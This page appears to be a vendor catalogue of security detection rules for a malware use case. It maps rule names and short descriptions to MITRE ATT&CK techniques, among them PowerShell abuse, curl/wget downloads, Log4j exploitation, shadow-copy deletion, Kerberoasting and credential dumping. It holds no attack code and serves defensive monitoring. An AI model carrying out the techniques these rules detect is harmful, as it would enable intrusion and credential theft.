Product: GitHub
Use-Case: Malware
| Rules | Models | MITRE ATT&CK® TTPs | Activity Types | Parsers |
|---|---|---|---|---|
| 164 | 25 | 76 | 3 | 6 |
| Event Type | Rules | Models |
|---|---|---|
| app-login | T1078 - Valid Accounts ↳ Auth-Blacklist-Shost: User authentication or login from a known blacklisted IP |
|
| authentication-successful | T1078 - Valid Accounts ↳ Auth-Blacklist-Shost: User authentication or login from a known blacklisted IP |
|
| process-created | T1059 - Command and Scripting Interperter ↳ EPA-PU-PS-F: First execution of powershell process for user ↳ EPA-PU-PS-A: Abnormal execution of powershell process for user ↳ EPA-PG-PS-F: First execution of powershell process for this peer group ↳ EPA-PG-PS-A: Abnormal execution of powershell process for this peer group ↳ Powershell-Advanced-A: Abnormal user using advanced powershell capabilities ↳ Powershell-Commands-F: First new Powershell Command ↳ Powershell-Commands-A: Abnormal Powershell Command ↳ Powershell-Script-F: First time this powershell script has been run ↳ Powershell-RunType-A: Abnormal invocation of powershell ↳ Powershell-WMI-F: First time for user using powershell WMI ↳ Powershell-WMI-A: Abnormal user using powershell WMI ↳ Powershell-Empire: The attacker tool, Powershell Empire, has been used ↳ WMIExec-VBS-Script: Suspicious usage of wscript/cscript ↳ FE-WC: Modified WMIPRVSE by FIREEYE for pentesting ↳ PC-PowerShell-SocketCreate: Powershell TCP Socket Creation through Powershell. ↳ PC-PowerShell-ExchangeSnapIns: Exchange Snap-In was imported and run by Powershell. ↳ PC-PowerShell-PowerCatDownload: PowerCat tool was downloaded via Powershell. ↳ PC-Powershell-HafniumActivity: Powershell HAFNIUM Activity ↳ PowerShell-Invoke-WebRequest: Powershell run with invoke-webrequest. ↳ Powershell-ExecPolicy-Bypass-F: First use of powershell with '-ExecutionPolicy Bypass' by the user ↳ Powershell-ExecPolicy-Bypass-A: Abnormal user using powershell with '-ExecutionPolicy Bypass' ↳ A-Suspicious-Persistence: Suspicious 'schtask' creation, possible attack tool usage on this asset ↳ A-DLL-ULOAD-EquationGroup: A known 'Equation Group' artifact was observed on this asset ↳ A-TrojanLoader: Possible Trojan Loader activity on this asset ↳ A-ZxShell: Known backdoor software, ZxShell, possibly loaded on this asset ↳ A-Archer: 'Archer' malware executed on this asset ↳ A-Hanword-Subprocess: Suspicious processes spawned by the Hangul word processor on this asset ↳ A-Outlook-Unsafe-Execution: A suspicious sub process was spawned by Microsoft Outlook on this asset ↳ A-TurlaGroup-LateralMovement: Artifacts from the ATP 'Turla Group' have been observed on this asset ↳ A-Sus-Powershell-Invocation-Parent-Proc: Suspicious Powershell invocation from interpreters or unusual programs on this asset. ↳ A-Sus-Encoded-PS-CmdLine: Suspicious Powershell process was started with base64 encoded commands on this asset. ↳ A-Base64-Powershell-CmdLine-Keywords: Base64 encoded strings were found in hidden malicious Powershell command lines on this asset. ↳ A-Baby-Shark-Activity: Activity related to Baby Shark malware has been found on this asset. ↳ A-Non-Interactive-Powershell: Non-Interactive Powershell activity was found on this asset. ↳ A-Powershell-Script-AppData: Powershell was invoked in a suspicious command line execution with reference to an AppData folder on this asset. ↳ A-Dtrack: Known banking malware, Dtrack, observed on this asset ↳ A-Suspicious-DAT: A suspicious .dat file used, possible APT activity on this asset ↳ A-Operation-Wocao-Activity: Possible Operation-Wocao APT activity on this asset, suspicious command line arguments ↳ A-Koadic-Tool-Usage: 'Koadic' attacker tool usage on this asset ↳ A-WScript-CScript-Dropper: Wscript or Cscript used for script execution from User directories on this asset ↳ A-Mshta-Javascript: Mshta.exe has executed a javascript related command on this asset ↳ A-Mshta-CMD-Spawn: Mshta.exe has executed a command line executable on this asset ↳ A-Suspicious-Shell-Child-Process: Windows shell has spawned a suspicious process on this asset ↳ A-WMI-Spawn-PowerShell: PowerShell was spawned via WMI on this asset. ↳ A-Powershell-CMDLETS: Malicious PowerShell script was used via get cmdlets function of PowerShell on the asset ↳ A-PowerShell-BITS-Job: BITS job via PowerShell was created on this asset. ↳ A-Mustang-Panda-Dropper: Possible Mustang Panda droppers execution on this asset. ↳ A-Mshta-Script: Mshta.exe .NET code execution on this asset. ↳ A-EPA-Powershell-Invoke-WebRequest-F: First execution of powershell process with invoke-webrequest for the asset in the organization. ↳ A-EPA-Powershell-Invoke-WebRequest-A: Abnormal execution of powershell process with invoke-webrequest for the asset in the organization. ↳ EPA-Powershell-Invoke-WebRequest-Domain-F: First execution of powershell process with invoke-webrequest and with this domain for the asset in the organization. ↳ EPA-Powershell-Invoke-WebRequest-Domain-A: Abnormal execution of powershell process with invoke-webrequest and with this domain for the asset in the organization. T1059.001 - Command and Scripting Interperter: PowerShell ↳ EPA-PU-PS-F: First execution of powershell process for user ↳ EPA-PU-PS-A: Abnormal execution of powershell process for user ↳ EPA-PG-PS-F: First execution of powershell process for this peer group ↳ EPA-PG-PS-A: Abnormal execution of powershell process for this peer group ↳ Powershell-Advanced-A: Abnormal user using advanced powershell capabilities ↳ Powershell-Commands-F: First new Powershell Command ↳ Powershell-Commands-A: Abnormal Powershell Command ↳ Powershell-Script-F: First time this powershell script has been run ↳ Powershell-RunType-A: Abnormal invocation of powershell ↳ Powershell-WMI-F: First time for user using powershell WMI ↳ Powershell-WMI-A: Abnormal user using powershell WMI ↳ Powershell-Empire: The attacker tool, Powershell Empire, has been used ↳ PC-PowerShell-SocketCreate: Powershell TCP Socket Creation through Powershell. ↳ PC-PowerShell-ExchangeSnapIns: Exchange Snap-In was imported and run by Powershell. ↳ PC-PowerShell-PowerCatDownload: PowerCat tool was downloaded via Powershell. ↳ PC-Powershell-HafniumActivity: Powershell HAFNIUM Activity ↳ PowerShell-Invoke-WebRequest: Powershell run with invoke-webrequest. ↳ Powershell-ExecPolicy-Bypass-F: First use of powershell with '-ExecutionPolicy Bypass' by the user ↳ Powershell-ExecPolicy-Bypass-A: Abnormal user using powershell with '-ExecutionPolicy Bypass' ↳ A-Suspicious-Persistence: Suspicious 'schtask' creation, possible attack tool usage on this asset ↳ A-Sus-Powershell-Invocation-Parent-Proc: Suspicious Powershell invocation from interpreters or unusual programs on this asset. ↳ A-Sus-Encoded-PS-CmdLine: Suspicious Powershell process was started with base64 encoded commands on this asset. ↳ A-Base64-Powershell-CmdLine-Keywords: Base64 encoded strings were found in hidden malicious Powershell command lines on this asset. ↳ A-Baby-Shark-Activity: Activity related to Baby Shark malware has been found on this asset. ↳ A-Non-Interactive-Powershell: Non-Interactive Powershell activity was found on this asset. ↳ A-Powershell-Script-AppData: Powershell was invoked in a suspicious command line execution with reference to an AppData folder on this asset. ↳ A-Operation-Wocao-Activity: Possible Operation-Wocao APT activity on this asset, suspicious command line arguments ↳ A-Mshta-CMD-Spawn: Mshta.exe has executed a command line executable on this asset ↳ A-Suspicious-Shell-Child-Process: Windows shell has spawned a suspicious process on this asset ↳ A-WMI-Spawn-PowerShell: PowerShell was spawned via WMI on this asset. ↳ A-Powershell-CMDLETS: Malicious PowerShell script was used via get cmdlets function of PowerShell on the asset ↳ A-PowerShell-BITS-Job: BITS job via PowerShell was created on this asset. ↳ A-EPA-Powershell-Invoke-WebRequest-F: First execution of powershell process with invoke-webrequest for the asset in the organization. ↳ A-EPA-Powershell-Invoke-WebRequest-A: Abnormal execution of powershell process with invoke-webrequest for the asset in the organization. ↳ EPA-Powershell-Invoke-WebRequest-Domain-F: First execution of powershell process with invoke-webrequest and with this domain for the asset in the organization. ↳ EPA-Powershell-Invoke-WebRequest-Domain-A: Abnormal execution of powershell process with invoke-webrequest and with this domain for the asset in the organization. T1218 - Signed Binary Proxy Execution ↳ PC-ParentName-ProcessName-DotNET-A: Abnormal child process creation for .NET associated process ↳ A-CSC-Suspicious-Parent-Process: Suspicious parent process for csc.exe, possible payload delivery on this asset ↳ A-MsiExec-Web-Install: A suspicious msiexec process was started with web addresses as a parameter on this asset. ↳ A-DLL-ULOAD-EquationGroup: A known 'Equation Group' artifact was observed on this asset ↳ A-TrojanLoader: Possible Trojan Loader activity on this asset ↳ A-ZxShell: Known backdoor software, ZxShell, possibly loaded on this asset ↳ A-Archer: 'Archer' malware executed on this asset ↳ A-Baby-Shark-Activity: Activity related to Baby Shark malware has been found on this asset. ↳ A-Empire-Monkey: EmpireMonkey APT activity was found on this asset. ↳ A-Suspicious-ControlPanel: Control Panel commandlets loaded outside the default directory on this asset ↳ A-Devtoolslauncher-Binary: Devtoolslauncher.exe has executed a binary on this asset ↳ A-HH-EXE-CHM: HH.exe usage, possible code execution on this asset ↳ A-MSHTA-SVCHOST: Mshta.exe spawned by svchost.exe, possible lateral movement on this asset ↳ A-Mshta-Javascript: Mshta.exe has executed a javascript related command on this asset ↳ A-Mshta-CMD-Spawn: Mshta.exe has executed a command line executable on this asset ↳ A-Suspicious-Shell-Child-Process: Windows shell has spawned a suspicious process on this asset ↳ A-OpenWith-Exec-Cmd: OpenWith.exe executed via command line on this asset. ↳ A-Ordinal-Rundll32-Call: Suspicious calls of DLLs in rundll32.dll exports by ordinal on this asset. ↳ A-Regsvr32-Suspicious-Cmd: Suspicious command line arguments related to regsvr32.exe have been observed on this asset. ↳ A-CDB-App-Whitelisting: 64-bit shellcode was launched using cdb.exe on this asset. ↳ A-PC-Mshta-Hta-F: First time hta file usage by Mshta.exe on this asset. ↳ A-PC-Mshta-Hta-A: Abnormal hta file usage by Mshta.exe on this asset. ↳ A-PC-Regsvr32-sct-F: First time sct file usage by Regsvr32.exe on this asset. ↳ A-PC-Regsvr32-sct-A: Abnormal sct file usage by Regsvr32.exe on the asset. ↳ A-PC-InstallUtil-exe-F: First time exe file usage by InstallUtil.exe on this asset. ↳ A-PC-InstallUtil-exe-A: Abnormal for exe file usage by InstallUtil.exe on this asset. ↳ A-PC-InstallUtil-dll-F: First time dll file usage by InstallUtil.exe on this asset. ↳ A-PC-InstallUtil-dll-A: Abnormal dll file usage by InstallUtil.exe on this asset. ↳ A-DotNET-URL: DotNET command line contains remote file on this asset. ↳ A-Mshta-Script: Mshta.exe .NET code execution on this asset. ↳ A-BinExec-MSI-Remote: 'Msiexec.exe' used to execute a remote '.msi' file on this host ↳ A-BinExec-HTA-Remote: 'Mshta.exe' used to execute a remote '.hta' file on this host ↳ A-BinExec-Odbcconf: 'Odbcconf.exe' used to execute a DLL on this host T1218.008 - T1218.008 ↳ A-BinExec-Odbcconf: 'Odbcconf.exe' used to execute a DLL on this host T1218.005 - T1218.005 ↳ PC-ParentName-ProcessName-DotNET-A: Abnormal child process creation for .NET associated process ↳ A-CSC-Suspicious-Parent-Process: Suspicious parent process for csc.exe, possible payload delivery on this asset ↳ A-Baby-Shark-Activity: Activity related to Baby Shark malware has been found on this asset. ↳ A-MSHTA-SVCHOST: Mshta.exe spawned by svchost.exe, possible lateral movement on this asset ↳ A-Mshta-Javascript: Mshta.exe has executed a javascript related command on this asset ↳ A-Mshta-CMD-Spawn: Mshta.exe has executed a command line executable on this asset ↳ A-Suspicious-Shell-Child-Process: Windows shell has spawned a suspicious process on this asset ↳ A-PC-Mshta-Hta-F: First time hta file usage by Mshta.exe on this asset. ↳ A-PC-Mshta-Hta-A: Abnormal hta file usage by Mshta.exe on this asset. ↳ A-DotNET-URL: DotNET command line contains remote file on this asset. ↳ A-Mshta-Script: Mshta.exe .NET code execution on this asset. ↳ A-BinExec-HTA-Remote: 'Mshta.exe' used to execute a remote '.hta' file on this host T1218.007 - Signed Binary Proxy Execution: Msiexec ↳ A-MsiExec-Web-Install: A suspicious msiexec process was started with web addresses as a parameter on this asset. ↳ A-BinExec-MSI-Remote: 'Msiexec.exe' used to execute a remote '.msi' file on this host T1053 - Scheduled Task/Job ↳ ChaferAPT-Activity: Chafer APT related activity observed ↳ EPA-UP-CrontabMod-F: First execution of process which contains commands for crontab modification for user. ↳ EPA-UP-CrontabMod-A: Abnormal execution of of process which contains commands for crontab modification for user. ↳ A-Suspicious-Persistence: Suspicious 'schtask' creation, possible attack tool usage on this asset ↳ A-New-ScheduledTask: New scheduled task created using schtasks.exe on this asset ↳ A-Defrag-Deactivation: Scheduled defragmentation task was deactivated on this asset. ↳ A-EPA-HP-CrontabMod-F: First execution of process on asset and the command of the process is crontab modification ↳ A-EPA-HP-CrontabMod-A: Abnormal execution of process on asset and the command of the process is crontab modification T1053.003 - T1053.003 ↳ EPA-UP-CrontabMod-F: First execution of process which contains commands for crontab modification for user. ↳ EPA-UP-CrontabMod-A: Abnormal execution of of process which contains commands for crontab modification for user. ↳ A-EPA-HP-CrontabMod-F: First execution of process on asset and the command of the process is crontab modification ↳ A-EPA-HP-CrontabMod-A: Abnormal execution of process on asset and the command of the process is crontab modification TA0002 - TA0002 ↳ EPA-UP-A: Abnormal execution of process for user ↳ EPA-GP-F: First execution of process for this peer group ↳ EPA-GP-A: Abnormal execution of process for this peer group ↳ EPA-PDir-F: First execution of a process in this directory for the organization ↳ EPA-HDir-Server-F: First execution of a process in this directory on a server ↳ EPA-PH-F: First execution of process (vssadmin.exe) on host ↳ EPA-F-CLI: Suspicious Windows process executed ↳ EPA-UH-Pen-F: Known pentest tool used ↳ SW-UC: Unusual child process loaded by SolarWinds tool ↳ ParentProcess-P-F: First execution of this parent process for peer group. ↳ ParentProcess-P-A: Abnormal parent process for peer group ↳ EPA-UP-Commands-F: First execution of this process for user and the command of the process is curl/wget ↳ EPA-UP-Commands-A: Abnormal process execution containing wget or curl commands for the user. ↳ A-EPA-HP-F: First execution of process on asset ↳ A-EPA-HP-A: Abnormal execution of process on asset ↳ A-EPA-ZP-A: Abnormal execution of process for the asset in this zone ↳ A-EPA-ZP-F: First execution of process for the asset in this zone ↳ A-EPA-OP-F: First execution of process for the asset in this organization ↳ A-EPA-OP-A: Abnormal execution of process for the asset in this organization ↳ A-EPA-HPP-F: First parent-process combination on asset ↳ A-EPA-HPP-A: Abnormal parent-process combination on asset ↳ A-EPA-OPP-F: First parent-process combination in this organization ↳ A-EPA-OPP-A: Abnormal parent-process combination in this organization ↳ A-EPA-TEMP-DIRECTORY-F: First execution of this process from a temporary directory on this asset ↳ A-EPA-TEMP-DIRECTORY-A: Abnormal execution of this process from a temporary directory ↳ A-Emotet: A process associated with the Emotet malware has been executed on this asset ↳ A-Qbot: Artifacts related to Qbot banking malware have been observed on this asset ↳ A-TropicTrooper-APT: Possible TropicTrooper APT artifacts observed on this asset ↳ A-EPA-HP-Commands-F: First execution of process on asset and the command of the process is curl/wget ↳ A-EPA-HP-Commands-A: Abnormal execution of process on asset and the command of the process is curl/wget T1562 - Impair Defenses ↳ A-Java-Remote-Dubugging: Java executed with remote debugging enabled on this asset ↳ A-KnownFirewallDisable-Log4j: FireWall disable arguments via command line were detected on this asset. T1562.004 - Impair Defenses: Disable or Modify System Firewall ↳ A-KnownFirewallDisable-Log4j: FireWall disable arguments via command line were detected on this asset. T1190 - Exploit Public Fasing Application ↳ A-EPA-Log4j-String-Command-2: There was an attempt via process creation to exploit the CVE-2021-44228 vulnerability using known keywords on this asset. T1059.005 - T1059.005 ↳ WMIExec-VBS-Script: Suspicious usage of wscript/cscript ↳ A-WScript-CScript-Dropper: Wscript or Cscript used for script execution from User directories on this asset ↳ A-Suspicious-Shell-Child-Process: Windows shell has spawned a suspicious process on this asset ↳ A-Mshta-Script: Mshta.exe .NET code execution on this asset. T1059.007 - T1059.007 ↳ A-WScript-CScript-Dropper: Wscript or Cscript used for script execution from User directories on this asset ↳ A-Mshta-Javascript: Mshta.exe has executed a javascript related command on this asset ↳ A-Mshta-Script: Mshta.exe .NET code execution on this asset. T1047 - Windows Management Instrumentation ↳ Powershell-WMI-F: First time for user using powershell WMI ↳ Powershell-WMI-A: Abnormal user using powershell WMI ↳ PC-ParentName-ProcessName-DotNET-A: Abnormal child process creation for .NET associated process ↳ A-Squibly-Two: A WMI SquiblyTwo Attack with possibly renamed WMI by looking for imphash was detected on this asset. ↳ A-DotNET-URL: DotNET command line contains remote file on this asset. T1127 - Trusted Developer Utilities Proxy Execution ↳ PC-ParentName-ProcessName-DotNET-A: Abnormal child process creation for .NET associated process ↳ A-CSharp-Interactive-Console: Execution of CSharp interactive console by PowerShell on this asset. ↳ A-Microsoft-Workflow-Compiler: Microsoft Workflow Compiler was invoked on this asset. ↳ A-CDB-App-Whitelisting: 64-bit shellcode was launched using cdb.exe on this asset. ↳ A-PC-MSBuild-xml-F: First time xml file usage by MSBuild.exe on this asset. ↳ A-PC-MSBuild-Csproj-F: First time csproj file usage by MSBuild.exe on this asset. ↳ A-DotNET-URL: DotNET command line contains remote file on this asset. T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild ↳ PC-ParentName-ProcessName-DotNET-A: Abnormal child process creation for .NET associated process ↳ A-PC-MSBuild-xml-F: First time xml file usage by MSBuild.exe on this asset. ↳ A-PC-MSBuild-Csproj-F: First time csproj file usage by MSBuild.exe on this asset. ↳ A-DotNET-URL: DotNET command line contains remote file on this asset. T1218.001 - Signed Binary Proxy Execution: Compiled HTML File ↳ A-HH-EXE-CHM: HH.exe usage, possible code execution on this asset ↳ A-DotNET-URL: DotNET command line contains remote file on this asset. T1218.004 - Signed Binary Proxy Execution: InstallUtil ↳ PC-ParentName-ProcessName-DotNET-A: Abnormal child process creation for .NET associated process ↳ A-PC-InstallUtil-exe-F: First time exe file usage by InstallUtil.exe on this asset. ↳ A-PC-InstallUtil-exe-A: Abnormal for exe file usage by InstallUtil.exe on this asset. ↳ A-PC-InstallUtil-dll-F: First time dll file usage by InstallUtil.exe on this asset. ↳ A-PC-InstallUtil-dll-A: Abnormal dll file usage by InstallUtil.exe on this asset. ↳ A-DotNET-URL: DotNET command line contains remote file on this asset. T1218.010 - Signed Binary Proxy Execution: Regsvr32 ↳ PC-ParentName-ProcessName-DotNET-A: Abnormal child process creation for .NET associated process ↳ A-Empire-Monkey: EmpireMonkey APT activity was found on this asset. ↳ A-Regsvr32-Suspicious-Cmd: Suspicious command line arguments related to regsvr32.exe have been observed on this asset. ↳ A-PC-Regsvr32-sct-F: First time sct file usage by Regsvr32.exe on this asset. ↳ A-PC-Regsvr32-sct-A: Abnormal sct file usage by Regsvr32.exe on the asset. T1574 - Hijack Execution Flow ↳ DLL-SideLoading: DLL sideloading malware used, known artifact of APT27 ↳ A-Winnti-Malware: Artifacts of 'Winnti' malware have been observed on this asset ↳ A-PlugX-DLL-Sideloading: DLL loaded from suspicous location on this asset, typically seen by the PlugX malware family ↳ A-ServiceName-ServiceCmdline-F: First time binary command line for this service on this asset. ↳ A-ServiceName-ServiceCmdline-A: Abnormal binary command line for this service T1574.010 - T1574.010 ↳ A-ServiceName-ServiceCmdline-F: First time binary command line for this service on this asset. ↳ A-ServiceName-ServiceCmdline-A: Abnormal binary command line for this service T1574.011 - T1574.011 ↳ A-ServiceName-ServiceCmdline-F: First time binary command line for this service on this asset. ↳ A-ServiceName-ServiceCmdline-A: Abnormal binary command line for this service T1203 - Exploitation for Client Execution ↳ A-Word-FLTLDR-Exploit-Vector: Possible loading of exploit using Microsoft Office and the fltldr.exe application on this asset ↳ A-Hanword-Subprocess: Suspicious processes spawned by the Hangul word processor on this asset ↳ A-WinWord-Uncommon-Subprocess: Winword has spawned an uncommon subprocess, csc.exe, on this asset ↳ A-PC-ParentName-UMWorkerProcess-F: First time child process creation for Exchange Unified Messaging service UMWorkerProcess.exe T1505 - Server Software Component ↳ A-WebShell-CLI: Possible command line web shell detected on this asset ↳ A-WebShell-WebServer: Possible web server web shell detected on this asset ↳ A-Suspicious-IIS-Modules: Native-Code modules for IIS installed via command line on this asset ↳ A-PC-ParentName-W3WP-F: First time child process creation for Exchange web front-end process w3wp.exe T1505.003 - Server Software Component: Web Shell ↳ A-WebShell-CLI: Possible command line web shell detected on this asset ↳ A-WebShell-WebServer: Possible web server web shell detected on this asset ↳ A-Suspicious-IIS-Modules: Native-Code modules for IIS installed via command line on this asset ↳ A-PC-ParentName-W3WP-F: First time child process creation for Exchange web front-end process w3wp.exe T1059.003 - T1059.003 ↳ FE-WC: Modified WMIPRVSE by FIREEYE for pentesting ↳ A-DLL-ULOAD-EquationGroup: A known 'Equation Group' artifact was observed on this asset ↳ A-TrojanLoader: Possible Trojan Loader activity on this asset ↳ A-ZxShell: Known backdoor software, ZxShell, possibly loaded on this asset ↳ A-Archer: 'Archer' malware executed on this asset ↳ A-Hanword-Subprocess: Suspicious processes spawned by the Hangul word processor on this asset ↳ A-Baby-Shark-Activity: Activity related to Baby Shark malware has been found on this asset. ↳ A-Operation-Wocao-Activity: Possible Operation-Wocao APT activity on this asset, suspicious command line arguments ↳ A-Koadic-Tool-Usage: 'Koadic' attacker tool usage on this asset ↳ A-Mshta-CMD-Spawn: Mshta.exe has executed a command line executable on this asset ↳ A-Mustang-Panda-Dropper: Possible Mustang Panda droppers execution on this asset. T1055 - Process Injection ↳ A-Zoho-DCTask: Dctask64.exe executed, possible process injection on this asset ↳ A-Svchost-Suspicious-Launch: Svchost.exe has launched without any command line arguments on this asset ↳ A-Formbook: Possible Formbook usage on this asset T1197 - BITS Jobs ↳ A-PowerShell-BITS-Job: BITS job via PowerShell was created on this asset. ↳ A-Bitsadmin-Download: Bitsadmin was used to download a file on this asset. T1546 - Event Triggered Execution ↳ FE-WC: Modified WMIPRVSE by FIREEYE for pentesting ↳ WMI-Script-Event-Consumers: Suspicious usage of WMI script event consumers. ↳ A-Shim-Installation: Possible installation of a 'shim' using sdbinst.exe on this asset ↳ A-FileType-Association-Change: File Association changed for this file extension on this asset ↳ A-WMI-Spawn-PowerShell: PowerShell was spawned via WMI on this asset. T1546.003 - T1546.003 ↳ FE-WC: Modified WMIPRVSE by FIREEYE for pentesting ↳ WMI-Script-Event-Consumers: Suspicious usage of WMI script event consumers. ↳ A-WMI-Spawn-PowerShell: PowerShell was spawned via WMI on this asset. T1218.011 - Signed Binary Proxy Execution: Rundll32 ↳ A-DLL-ULOAD-EquationGroup: A known 'Equation Group' artifact was observed on this asset ↳ A-TrojanLoader: Possible Trojan Loader activity on this asset ↳ A-ZxShell: Known backdoor software, ZxShell, possibly loaded on this asset ↳ A-Archer: 'Archer' malware executed on this asset ↳ A-Suspicious-Shell-Child-Process: Windows shell has spawned a suspicious process on this asset ↳ A-Ordinal-Rundll32-Call: Suspicious calls of DLLs in rundll32.dll exports by ordinal on this asset. T1563 - Remote Service Session Hijacking ↳ A-MSTSC-RDP-Hijack: MSTSC Shadowing, possible RDP session hijack/shadowing of session on this asset T1563.002 - T1563.002 ↳ A-MSTSC-RDP-Hijack: MSTSC Shadowing, possible RDP session hijack/shadowing of session on this asset T1012 - Query Registry ↳ A-Baby-Shark-Activity: Activity related to Baby Shark malware has been found on this asset. ↳ A-Operation-Wocao-Activity: Possible Operation-Wocao APT activity on this asset, suspicious command line arguments T1027 - Obfuscated Files or Information ↳ A-CSC-Suspicious-Parent-Process: Suspicious parent process for csc.exe, possible payload delivery on this asset ↳ A-CSC-Suspicious-Folder: Csc.exe spawned from suspicious folder on this asset ↳ A-Sus-Encoded-PS-CmdLine: Suspicious Powershell process was started with base64 encoded commands on this asset. ↳ A-Base64-Powershell-CmdLine-Keywords: Base64 encoded strings were found in hidden malicious Powershell command lines on this asset. ↳ A-Operation-Wocao-Activity: Possible Operation-Wocao APT activity on this asset, suspicious command line arguments T1036 - Masquerading ↳ A-Executable-Suspicious-Folder: A process has been run from a binary located in a suspicious folder on this asset ↳ A-Sus-Double-Extension: An .exe extension was used after a different non-executable file extension on this asset. ↳ A-Operation-Wocao-Activity: Possible Operation-Wocao APT activity on this asset, suspicious command line arguments T1036.004 - T1036.004 ↳ A-Operation-Wocao-Activity: Possible Operation-Wocao APT activity on this asset, suspicious command line arguments T1482 - Domain Trust Discovery ↳ A-Trickbot-Recon: Trickbot malware domain recon activity on this asset T1204 - User Execution ↳ A-CMD-Spawn-From-Office: A command line executable was spawned from an Office application on this asset ↳ A-UserProcess-Spawned-FromOffice: An executable running under the 'Users' path has been spawned from an Office application on this asset ↳ A-WinWord-Uncommon-Subprocess: Winword has spawned an uncommon subprocess, csc.exe, on this asset T1204.002 - T1204.002 ↳ A-CMD-Spawn-From-Office: A command line executable was spawned from an Office application on this asset ↳ A-UserProcess-Spawned-FromOffice: An executable running under the 'Users' path has been spawned from an Office application on this asset ↳ A-WinWord-Uncommon-Subprocess: Winword has spawned an uncommon subprocess, csc.exe, on this asset T1218.002 - Signed Binary Proxy Execution: Control Panel ↳ A-Suspicious-ControlPanel: Control Panel commandlets loaded outside the default directory on this asset T1546.001 - T1546.001 ↳ A-FileType-Association-Change: File Association changed for this file extension on this asset T1113 - Screen Capture ↳ A-PSR-Screenshot: Psr.exe was used to take a screenshot on this asset T1547 - Boot or Logon Autostart Execution ↳ DLL-SideLoading: DLL sideloading malware used, known artifact of APT27 ↳ A-AutoRun-Modification: AutoRun Keys modified using reg.exe on this asset T1547.001 - T1547.001 ↳ A-AutoRun-Modification: AutoRun Keys modified using reg.exe on this asset T1123 - Audio Capture ↳ A-Powershell-AudioCapture: Powershell has recorded external audio on this asset ↳ A-SoundRecorder-AudioCapture: SoundRecorder has recorded external audio on this asset T1543 - Create or Modify System Process ↳ EPA-SERVICE-PARAMS: Suspicious parameters found in process for service creation ↳ A-EPA-USF-F: First process per service name for asset ↳ A-ServicePath-Modification: Suspicious service path identified on this asset T1543.003 - Create or Modify System Process: Windows Service ↳ EPA-SERVICE-PARAMS: Suspicious parameters found in process for service creation ↳ A-EPA-USF-F: First process per service name for asset ↳ A-ServicePath-Modification: Suspicious service path identified on this asset T1105 - Ingress Tool Transfer ↳ A-MsiExec-Web-Install: A suspicious msiexec process was started with web addresses as a parameter on this asset. ↳ A-Office-Payload-Download: Possible malicious payload download via Microsoft Office binaries on this asset T1546.011 - T1546.011 ↳ A-Shim-Installation: Possible installation of a 'shim' using sdbinst.exe on this asset T1490 - Inhibit System Recovery ↳ EPA-EXPERT-SHADOW-COPIES: A Suspicious command that deletes shadow copies has been executed for process ↳ EPA-EXPERT-DISABLE-RECOVERY: A Suspicious command that disables recovery mode has been executed for process ↳ A-Mod-Boot-Config: Boot configuration data was deleted using the bcdedit command on this asset. T1210 - Exploitation of Remote Services ↳ A-SIGRed: Possible SIGRed (CVE-2020-1350) exploitation on this asset T1569 - System Services ↳ A-SIGRed: Possible SIGRed (CVE-2020-1350) exploitation on this asset T1021 - Remote Services ↳ A-TurlaGroup-LateralMovement: Artifacts from the ATP 'Turla Group' have been observed on this asset T1021.002 - Remote Services: SMB/Windows Admin Shares ↳ A-TurlaGroup-LateralMovement: Artifacts from the ATP 'Turla Group' have been observed on this asset T1083 - File and Directory Discovery ↳ A-TurlaGroup-LateralMovement: Artifacts from the ATP 'Turla Group' have been observed on this asset T1135 - Network Share Discovery ↳ A-TurlaGroup-LateralMovement: Artifacts from the ATP 'Turla Group' have been observed on this asset T1202 - Indirect Command Execution ↳ A-UserProcess-Spawned-FromOffice: An executable running under the 'Users' path has been spawned from an Office application on this asset ↳ A-Outlook-Unsafe-Execution: A suspicious sub process was spawned by Microsoft Outlook on this asset T1055.001 - Process Injection: Dynamic-link Library Injection ↳ A-Zoho-DCTask: Dctask64.exe executed, possible process injection on this asset T1027.004 - Obfuscated Files or Information: Compile After Delivery ↳ A-CSC-Suspicious-Parent-Process: Suspicious parent process for csc.exe, possible payload delivery on this asset ↳ A-CSC-Suspicious-Folder: Csc.exe spawned from suspicious folder on this asset T1574.002 - Hijack Execution Flow: DLL Side-Loading ↳ A-Winnti-Malware: Artifacts of 'Winnti' malware have been observed on this asset ↳ A-PlugX-DLL-Sideloading: DLL loaded from suspicous location on this asset, typically seen by the PlugX malware family T1555 - Credentials from Password Stores ↳ A-SecX-Tool-Exec: SecurityXploded Tool execution detected on this asset T1003 - OS Credential Dumping ↳ ATP-PWDump: Malicious exe was run which is a part of credential dumping tool ↳ A-Rubeus-CMD-Tool: Command line parameters used by Rubeus hack tool detected on this asset T1550 - Use Alternate Authentication Material ↳ A-Rubeus-CMD-Tool: Command line parameters used by Rubeus hack tool detected on this asset T1550.003 - Use Alternate Authentication Material: Pass the Ticket ↳ A-Rubeus-CMD-Tool: Command line parameters used by Rubeus hack tool detected on this asset T1558 - Steal or Forge Kerberos Tickets ↳ A-Rubeus-CMD-Tool: Command line parameters used by Rubeus hack tool detected on this asset T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting ↳ A-Rubeus-CMD-Tool: Command line parameters used by Rubeus hack tool detected on this asset T1053.005 - Scheduled Task/Job: Scheduled Task ↳ A-Suspicious-Persistence: Suspicious 'schtask' creation, possible attack tool usage on this asset ↳ A-New-ScheduledTask: New scheduled task created using schtasks.exe on this asset T1134 - Access Token Manipulation ↳ A-Suspicious-GetSystem-Usage: Possible Meterpeter/Cobalt Strike usage of GetSystem on this asset T1134.001 - Access Token Manipulation: Token Impersonation/Theft ↳ A-Suspicious-GetSystem-Usage: Possible Meterpeter/Cobalt Strike usage of GetSystem on this asset T1134.002 - T1134.002 ↳ A-Suspicious-GetSystem-Usage: Possible Meterpeter/Cobalt Strike usage of GetSystem on this asset T1003.002 - T1003.002 ↳ ATP-PWDump: Malicious exe was run which is a part of credential dumping tool T1547.002 - T1547.002 ↳ DLL-SideLoading: DLL sideloading malware used, known artifact of APT27 T1112 - Modify Registry ↳ ChaferAPT-Activity: Chafer APT related activity observed |
